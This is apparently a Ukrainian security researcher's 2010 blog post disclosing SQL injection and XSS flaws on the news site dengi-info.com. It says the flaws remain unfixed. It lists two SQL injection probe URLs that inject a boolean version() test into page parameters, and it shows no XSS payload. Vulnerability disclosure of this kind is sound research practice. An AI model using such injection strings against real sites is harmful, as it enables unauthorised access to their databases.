« Розсилка спаму через сайти та створення спам-ботнетів
Mozilla заблокувала шкідливий плагін для Firefox »

Уразливості на www.dengi-info.com

15:28 19.07.2010

03.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://www.dengi-info.com (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

19.07.2010

SQL Injection:

http://www.dengi-info.com/archive/read.php?iid=-1%20or%20version()=5

http://www.dengi-info.com/news/?nid=-1%20or%20version()=5

XSS:

Дані уразливості досі не виправлені.


This entry was posted on 15:28 19.07.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.